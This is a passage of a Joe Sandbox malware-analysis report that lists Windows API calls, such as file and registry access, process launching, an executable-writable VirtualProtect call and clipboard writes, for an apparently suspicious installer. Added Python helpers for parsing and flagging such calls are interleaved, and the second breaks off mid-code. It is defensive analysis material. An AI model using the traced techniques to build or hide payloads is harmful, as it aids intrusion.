                                                              • Instruction Fuzzy Hash: 96E0463221021AABCF10AF50CC04AAB3B6CFB003A0F004432B955E2050D230EA208AE9
                                                              APIs
                                                              • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403328,00000000,00000000,0040314C,?,00000004,00000000,00000000,00000000), ref: 00405E0B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID:
                                                              • API String ID: 2738559852-0
                                                              • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                              • Instruction ID: e221de633d5b74da9fce23a9c995dc3304d5126a795d503f9c3389b6b2e666c2
                                                              • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                              • Instruction Fuzzy Hash: 4DE0EC3221025AABDF10AF95DC00EEB7B6CEB05360F044436FA65E7150D631EA619BF8
                                                              APIs
                                                              • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2865137888.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                               • Associated: 00000000.00000002.2865038779.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000000.00000002.2865174166.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000000.00000002.2865214648.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual
                                                              • String ID:
                                                              • API String ID: 544645111-0
                                                              • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                              • Instruction ID: 43a77b614ff4017466e57d7f63f0e44ab05d53355a3bca00642047650885b550
                                                              • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                              • Instruction Fuzzy Hash: C5F0A5F15057A0DEF350DF688C847063BE4E3583C4B03852AE368F6269EB344454DF19
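The "APIs" lists in these function entries are the report's raw output, and the one above is worth reading closely: the VirtualProtect call at ref 100027E0 requests protection 00000040 (PAGE_EXECUTE_READWRITE) for 4 bytes at 1000405C inside the module loaded at 10000000, i.e. it makes a small slice of that module writable and executable at once. The Python below is an added example, not part of the Joe Sandbox report or its IDA plugin, showing how to turn such "api.module(args), ref: address" lines into structured records and flag VirtualProtect calls that ask for a writable+executable page. The sample text is constructed by copying entries from this page; the function names and the hex-argument heuristic are my own assumptions about the report format (arguments that are exactly 8 hex digits are treated as 32-bit values, "?" as unrecovered).

```python
import re
from typing import Dict, List, Optional, Union

# Constructed sample: API entries copied in the shape Joe Sandbox prints them
# (api.module(args), ref: address). One such list appears per analysed function.
SAMPLE_REPORT = r"""
APIs
• GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\450707124374000811.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
• CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A
• SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402807
  • Part of subcall function 004061C9: wsprintfW.USER32 ref: 004061D6
• VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E0
• RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CE8,00000000,?,?), ref: 00406146
Memory Dump Source
"""

# One report line: optional "Part of subcall function XXXX:" prefix, then
# api.module, an optional parenthesised argument list, and the call site ref.
API_LINE = re.compile(
    r"^\s*•\s+(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s+)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX32 = re.compile(r"^[0-9A-Fa-f]{8}$")

# Win32 memory protection constants (flNewProtect argument of VirtualProtect).
_PAGE_BASE = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
_PAGE_MOD = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
WRITABLE_EXECUTABLE = 0x40 | 0x80  # PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY

Arg = Union[int, str, None]


def _arg(token: str) -> Arg:
    token = token.strip()
    if token == "?":
        return None             # sandbox could not recover the value
    if HEX32.match(token):
        return int(token, 16)   # 32-bit immediate or pointer, printed as 8 hex digits
    return token                # recovered string argument (path, key name, ...)


def parse_api_entries(text: str) -> List[Dict]:
    """Return one record per API line; non-matching report lines are skipped.
    Assumes recovered string arguments contain no commas (true for this page)."""
    entries = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [_arg(t) for t in raw.split(",")] if raw else []
        entries.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": args,
            "ref": m.group("ref").upper(),
            "parent": m.group("parent"),   # set when the line is a subcall entry
        })
    return entries


def decode_protect(value: int) -> str:
    """Name a protection constant, e.g. 0x40 -> PAGE_EXECUTE_READWRITE."""
    names = [n for bit, n in _PAGE_BASE.items() if (value & 0xFF) == bit]
    names += [n for bit, n in _PAGE_MOD.items() if value & bit]
    return "|".join(names) if names else f"0x{value:X}"


def find_rwx_protect(entries: List[Dict]) -> List[Dict]:
    """Flag VirtualProtect(lpAddress, dwSize, flNewProtect, ...) calls whose
    requested protection is both writable and executable."""
    hits = []
    for e in entries:
        if e["api"] != "VirtualProtect" or len(e["args"]) < 3:
            continue
        prot = e["args"][2]
        if isinstance(prot, int) and prot & WRITABLE_EXECUTABLE:
            hits.append({
                "address": e["args"][0], "size": e["args"][1],
                "protect": prot, "name": decode_protect(prot), "ref": e["ref"],
            })
    return hits


if __name__ == "__main__":
    parsed = parse_api_entries(SAMPLE_REPORT)
    for hit in find_rwx_protect(parsed):
        print(f"ref {hit['ref']}: VirtualProtect({hit['address']:08X}, "
              f"{hit['size']}, {hit['name']})")
```

Running it on the constructed sample reports the single RWX request from this page; on a full report export the same parser gives you every call site, module (KERNELBASE vs KERNEL32 tells you where the import actually resolved) and argument list as data, rather than text to eyeball.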
                                                              APIs
                                                              • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402379
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileString
                                                              • String ID:
                                                              • API String ID: 1096422788-0
                                                              • Opcode ID: c6a8cbcbc31f6e602369a5318af1bf20fc7f19c6dcae62e72b5fc0541244e301
                                                              • Instruction ID: 69d349e7d285c822079f9e4bf846872a9f1ef35916f06b7134f04da07b3971da
                                                              • Opcode Fuzzy Hash: c6a8cbcbc31f6e602369a5318af1bf20fc7f19c6dcae62e72b5fc0541244e301
                                                              • Instruction Fuzzy Hash: 25E0487080420CAADB106FA1CE099BE7A64AF00340F104439F5907B0D1E6FC84415745
                                                              APIs
                                                              • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,0042C228,?,?,0040617D,0042C228,00000000,?,?,Call,?), ref: 00406113
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: Open
                                                              • String ID:
                                                              • API String ID: 71445658-0
                                                              • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                              • Instruction ID: 3f4f51c5761301f24834a255f16e5381e59d2a113ab40b24d84d285923e9a67b
                                                              • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                              • Instruction Fuzzy Hash: 47D0173604020DBBEF119F90ED01FAB3B6DAB08314F014826FE16A80A2D776D530AB68
                                                              APIs
                                                              • SendMessageW.USER32(00000028,?,00000001,00404077), ref: 0040425A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
                                                              • Instruction ID: 35ea918b965a0e533a09ef3704f79fc1997eb74e27ad0e26ff3c84f6d98ddf78
                                                              • Opcode Fuzzy Hash: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
                                                              • Instruction Fuzzy Hash: ACB0923A180600AADE118B40DE4AF857A62F7A4701F018138B240640B0CAB200E0DB48
                                                              APIs
                                                              • SetFilePointer.KERNELBASE(?,00000000,00000000,00403088,?,?,00000006,00000008,0000000A), ref: 00403339
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: FilePointer
                                                              • String ID:
                                                              • API String ID: 973152223-0
                                                              • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                              • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                              • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                              • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                              APIs
                                                              • ShellExecuteExW.SHELL32(?), ref: 004058B9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: ExecuteShell
                                                              • String ID:
                                                              • API String ID: 587946157-0
                                                              • Opcode ID: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                                              • Instruction ID: 322818d701d9cc3fc85427ca8463de8bac6637280c84b784c1803e53dd53602d
                                                              • Opcode Fuzzy Hash: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                                              • Instruction Fuzzy Hash: 55C092B2000200DFE301CF90CB08F067BF8AF59306F028058E1849A160C7788800CB69
                                                              APIs
                                                                • Part of subcall function 004052E6: lstrlenW.KERNEL32(0042C228,00000000,0041D800,759223A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                                • Part of subcall function 004052E6: lstrlenW.KERNEL32(0040325E,0042C228,00000000,0041D800,759223A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                                • Part of subcall function 004052E6: lstrcatW.KERNEL32(0042C228,0040325E,0040325E,0042C228,00000000,0041D800,759223A0), ref: 00405341
                                                                • Part of subcall function 004052E6: SetWindowTextW.USER32(0042C228,0042C228), ref: 00405353
                                                                • Part of subcall function 004052E6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                                • Part of subcall function 004052E6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                                • Part of subcall function 004052E6: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                                • Part of subcall function 00405867: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405890
                                                                • Part of subcall function 00405867: CloseHandle.KERNEL32(?), ref: 0040589D
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F47
                                                                • Part of subcall function 0040670D: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040671E
                                                                • Part of subcall function 0040670D: GetExitCodeProcess.KERNEL32(?,?), ref: 00406740
                                                                • Part of subcall function 004061C9: wsprintfW.USER32 ref: 004061D6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                              • String ID:
                                                              • API String ID: 2972824698-0
                                                              • Opcode ID: a0367c61fa75c7fa1ed8603c7bcbb816b6d25ff725675df51efd44c1739e69f8
                                                              • Instruction ID: 0c3abe8747980e4b1c062509ec269ea7acbc1ace6387f940061889d1bd78c20b
                                                              • Opcode Fuzzy Hash: a0367c61fa75c7fa1ed8603c7bcbb816b6d25ff725675df51efd44c1739e69f8
                                                              • Instruction Fuzzy Hash: F5F09032905115DBCB20FFA19D848DE62A49F01368B25057FF102F61D1C77C0E459AAE
                                                              APIs
                                                              • GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2865137888.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                               • Associated: 00000000.00000002.2865038779.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000000.00000002.2865174166.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000000.00000002.2865214648.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: AllocGlobal
                                                              • String ID:
                                                              • API String ID: 3761449716-0
                                                              • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                              • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
                                                              • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                              • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638
                                                              APIs
                                                              • GetDlgItem.USER32(?,00000403), ref: 00405483
                                                              • GetDlgItem.USER32(?,000003EE), ref: 00405492
                                                              • GetClientRect.USER32(?,?), ref: 004054CF
                                                              • GetSystemMetrics.USER32(00000002), ref: 004054D6
                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054F7
                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405508
                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040551B
                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405529
                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040553C
                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040555E
                                                              • ShowWindow.USER32(?,00000008), ref: 00405572
                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405593
                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055A3
                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055BC
                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055C8
                                                              • GetDlgItem.USER32(?,000003F8), ref: 004054A1
                                                                • Part of subcall function 0040424C: SendMessageW.USER32(00000028,?,00000001,00404077), ref: 0040425A
                                                              • GetDlgItem.USER32(?,000003EC), ref: 004055E5
                                                              • CreateThread.KERNEL32(00000000,00000000,Function_000053B9,00000000), ref: 004055F3
                                                              • CloseHandle.KERNEL32(00000000), ref: 004055FA
                                                              • ShowWindow.USER32(00000000), ref: 0040561E
                                                              • ShowWindow.USER32(?,00000008), ref: 00405623
                                                              • ShowWindow.USER32(00000008), ref: 0040566D
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056A1
                                                              • CreatePopupMenu.USER32 ref: 004056B2
                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056C6
                                                              • GetWindowRect.USER32(?,?), ref: 004056E6
                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056FF
                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405737
                                                              • OpenClipboard.USER32(00000000), ref: 00405747
                                                              • EmptyClipboard.USER32 ref: 0040574D
                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405759
                                                              • GlobalLock.KERNEL32(00000000), ref: 00405763
                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405777
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405797
                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 004057A2
                                                              • CloseClipboard.USER32 ref: 004057A8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                              • String ID: {
                                                              • API String ID: 590372296-366298937
                                                              • Opcode ID: 008adb25098ef1b1bb6e7edf5b259777504a6f11eb67abc6bb5002a761aaad34
                                                              • Instruction ID: 2f82927f57e7d4f45bca6e23eab998b55dded590160266c2ba262d9988700e91
                                                              • Opcode Fuzzy Hash: 008adb25098ef1b1bb6e7edf5b259777504a6f11eb67abc6bb5002a761aaad34
                                                              • Instruction Fuzzy Hash: 37B16970800608BFDB119FA0DD89AAE7B79FB48355F00403AFA45B61A0CB759E51DF68
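The entry above is the report's raw per-function API listing, and reading it by hand across hundreds of functions is slow. The following Python helper is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses lines in the `API.MODULE(args), ref: addr` shape used throughout this section, resolves the window-message, clipboard-format and GlobalAlloc-flag constants that appear above from their winuser.h/commctrl.h values, and checks for the ordered OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard sequence that underlies the "Contains functionality for read data from the clipboard" signature. The sample input is constructed from the clipboard routine listed above; the class, function and table names are my own assumptions.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample: direct calls of the clipboard routine above (refs 00405737..004057A8)
# plus one "Part of subcall function" line in the same report format.
SAMPLE = """\
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405737
• OpenClipboard.USER32(00000000), ref: 00405747
• EmptyClipboard.USER32 ref: 0040574D
• GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405759
• GlobalLock.KERNEL32(00000000), ref: 00405763
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405777
• GlobalUnlock.KERNEL32(00000000), ref: 00405797
• SetClipboardData.USER32(0000000D,00000000), ref: 004057A2
• CloseClipboard.USER32 ref: 004057A8
  • Part of subcall function 0040424C: SendMessageW.USER32(00000028,?,00000001,00404077), ref: 0040425A
"""

# One report line: optional subcall prefix, API.MODULE, optional (args), ref: address.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)

# Constants resolved for annotation (winuser.h / commctrl.h values; LVM_FIRST is 0x1000).
WINDOW_MESSAGES = {
    0x0028: "WM_NEXTDLGCTL",
    0x1001: "LVM_SETBKCOLOR", 0x1004: "LVM_GETITEMCOUNT", 0x1013: "LVM_ENSUREVISIBLE",
    0x1024: "LVM_SETTEXTCOLOR", 0x1026: "LVM_SETTEXTBKCOLOR", 0x1036: "LVM_SETEXTENDEDLISTVIEWSTYLE",
    0x104D: "LVM_INSERTITEMW", 0x1061: "LVM_INSERTCOLUMNW", 0x1073: "LVM_GETITEMTEXTW",
}
CLIPBOARD_FORMATS = {0x1: "CF_TEXT", 0xD: "CF_UNICODETEXT"}
GMEM_FLAGS = {0x02: "GMEM_MOVEABLE", 0x40: "GMEM_ZEROINIT"}
CLIPBOARD_WRITE = ["OpenClipboard", "EmptyClipboard", "SetClipboardData", "CloseClipboard"]


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: int
    subcall_of: Optional[int] = None  # callee address when the line is "Part of subcall function"

    def arg_int(self, i: int) -> Optional[int]:
        """Argument i as an int when it is an 8-digit hex literal; None for '?' or strings."""
        if i >= len(self.args):
            return None
        a = self.args[i]
        return int(a, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", a) else None


def parse_api_lines(text: str) -> list:
    """Parse every report line that matches LINE_RE; unrelated lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
        sub = m.group("sub")
        calls.append(ApiCall(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16),
                             int(sub, 16) if sub else None))
    return calls


def describe(call: ApiCall) -> str:
    """Render a call with the constants an analyst would otherwise look up by hand."""
    notes = []
    if call.api == "SendMessageW" and call.arg_int(1) in WINDOW_MESSAGES:
        notes.append(WINDOW_MESSAGES[call.arg_int(1)])
    elif call.api == "SetClipboardData" and call.arg_int(0) in CLIPBOARD_FORMATS:
        notes.append(CLIPBOARD_FORMATS[call.arg_int(0)])
    elif call.api == "GlobalAlloc" and call.arg_int(0) is not None:
        flags = call.arg_int(0)
        notes.append("|".join(n for bit, n in GMEM_FLAGS.items() if flags & bit) or "GMEM_FIXED")
    text = f"{call.ref:08X} {call.api}({', '.join(call.args)})"
    return text + (f"  ; {' '.join(notes)}" if notes else "")


def find_clipboard_write(calls: list):
    """Detect an ordered OpenClipboard -> EmptyClipboard -> SetClipboardData -> CloseClipboard
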